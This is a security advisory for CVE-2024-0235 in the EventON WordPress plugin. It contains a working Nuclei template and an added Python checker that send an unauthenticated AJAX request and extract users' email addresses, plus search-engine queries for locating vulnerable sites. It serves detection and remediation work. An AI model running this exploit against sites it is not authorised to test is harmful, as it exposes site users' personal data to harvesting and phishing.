CVE-2024-0235: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure

Date: 2025-08-01 | Affected software: EventON | PoC: public

Vulnerability description

The EventON WordPress plugin (Premium) before 4.5.5 and the free EventON plugin before 2.2.7 perform no authorization check in an AJAX action, so an unauthenticated user can retrieve the email addresses of any user on the blog. Concretely, the `eventon_get_virtual_users` action is reachable through `wp-admin/admin-ajax.php` without a login, nonce or capability check (CWE-862, missing authorization); posting `_user_role=administrator` returns user records including their email addresses. Note that this description and the title disagree on the free-version fix boundary (2.2.7 versus 2.2.8); 2.2.8 or later is safe under either reading, so confirm the exact fixed version against the WPScan advisory before closing a finding. The Nuclei template below is signed (see its trailing digest line), so keep it byte-for-byte as published if you intend to run it with signature verification enabled.

PoC code [public]

id: CVE-2024-0235

info:
  name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
  author: ProjectDiscoveryAI
  severity: medium
  description: |
    The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
  impact: |
    An attacker could potentially access sensitive email information.
  remediation: |
    Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
  reference:
    - https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0235
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-0235
    cwe-id: CWE-862
    epss-score: 0.81849
    epss-percentile: 0.99159
    cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: myeventon
    product: eventon
    framework: wordpress
    shodan-query:
      - "vuln:CVE-2023-2796"
      - http.html:/wp-content/plugins/eventon-lite/
      - http.html:/wp-content/plugins/eventon/
    fofa-query:
      - "wp-content/plugins/eventon/"
      - body=/wp-content/plugins/eventon/
      - body=/wp-content/plugins/eventon-lite/
    publicwww-query:
      - "/wp-content/plugins/eventon/"
      - /wp-content/plugins/eventon-lite/
    google-query: "inurl:\"/wp-content/plugins/eventon/\""
  tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon,vkev

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: "_user_role=administrator"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '@'
          - 'status":"good'
          - 'value='
          - '"content":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b9cd1df28f5dac7ad5efc92fb4e259fddf100a0680c4a176aa62bdc09458edb8022100e195175549b445f642c823937a604892bb68e79fdf8a56efee731f86a63d1f64:922c64590222798bb761d5b6d8e72950
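The template above is a yes/no probe. The following Python checker is an added example, not code from this page, from the EventON vendor or from ProjectDiscovery: it sends the same unauthenticated POST, applies the same four-marker test plus the HTTP 200 requirement, and additionally extracts the leaked addresses so a finding can be reported with its real impact rather than a bare "matched". The JSON layout of the embedded sample responses is constructed from the substrings the matchers test for (`status":"good`, `"content":`, `value=`) and is an assumption about the plugin's actual output; the `0` body is what `admin-ajax.php` returns when no handler is hooked for an action. Probing roles other than `administrator` is also an assumption, not something the advisory states.

```python
"""Checker for CVE-2024-0235 (EventON, unauthenticated eventon_get_virtual_users).

Added example, not code from the page, the plugin vendor or ProjectDiscovery.
ASSUMPTION: the JSON layout of the sample bodies below is reconstructed from the
substrings the Nuclei matchers test for, not taken from the plugin's real output.
"""
from __future__ import annotations

import json
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

AJAX_ACTION = "eventon_get_virtual_users"
# Same four substrings the Nuclei template requires, together with HTTP 200.
REQUIRED_MARKERS = ('"content":', 'status":"good', "value=", "@")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


def build_request(base_url: str, role: str = "administrator") -> urllib.request.Request:
    """The unauthenticated POST from the advisory: no cookie, no nonce, just a role.
    Roles other than 'administrator' are an assumption, not stated by the advisory."""
    url = base_url.rstrip("/") + "/wp-admin/admin-ajax.php?" + urllib.parse.urlencode(
        {"action": AJAX_ACTION})
    data = urllib.parse.urlencode({"_user_role": role}).encode()
    return urllib.request.Request(
        url, data=data, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"})


def extract_emails(body: str) -> list[str]:
    """Distinct addresses in the response, in order of first appearance.
    If the body is JSON with a string 'content' field, search that field so
    JSON escaping cannot hide or split an address."""
    text = body
    try:
        parsed = json.loads(body)
        if isinstance(parsed, dict) and isinstance(parsed.get("content"), str):
            text = parsed["content"]
    except json.JSONDecodeError:
        pass
    seen = set()
    found = []
    for addr in EMAIL_RE.findall(text):
        if addr.lower() not in seen:
            seen.add(addr.lower())
            found.append(addr)
    return found


def assess(status: int, body: str) -> dict:
    """Apply the template's matchers, then require at least one parsed address so a
    stray '@' in unrelated HTML is not reported as a leak."""
    if status != 200:
        return {"vulnerable": False, "emails": [], "reason": f"HTTP {status}"}
    missing = [m for m in REQUIRED_MARKERS if m not in body]
    if missing:
        return {"vulnerable": False, "emails": [], "reason": f"markers absent: {missing}"}
    emails = extract_emails(body)
    if not emails:
        return {"vulnerable": False, "emails": [], "reason": "markers present but no address parsed"}
    return {"vulnerable": True, "emails": emails,
            "reason": "user e-mail addresses returned without authentication"}


def check(base_url: str, role: str = "administrator", timeout: float = 10.0) -> dict:
    """Send the probe and classify the answer. admin-ajax.php replies '0' with HTTP 400
    when no handler is hooked for the action; urllib surfaces that as HTTPError."""
    req = build_request(base_url, role)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return assess(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return assess(err.code, err.read().decode("utf-8", "replace"))


# Constructed sample bodies (layout is an assumption, see the module docstring).
SAMPLE_LEAK = json.dumps(
    {"status": "good",
     "content": "<option value='admin@example.test'>admin</option>"
                "<option value='eve@example.test'>eve</option>"
                "<option value='admin@example.test'>admin again</option>"},
    separators=(",", ":"))  # compact form, as PHP json_encode emits it
SAMPLE_UNHOOKED = "0"  # admin-ajax.php body for an action with no registered handler

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(json.dumps(check(sys.argv[1]), indent=2))
    else:
        print(assess(200, SAMPLE_LEAK))
        print(assess(400, SAMPLE_UNHOOKED))
```

Run it as `python3 check_eventon.py https://target.example` against a host you are authorized to test; with no argument it only evaluates the embedded samples. The extra "at least one parsed address" step is deliberate: the template's `'@'` matcher alone would also fire on an error page that happens to contain a contact address, so the checker refuses to call a host vulnerable unless it can name what leaked.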

Related vulnerabilities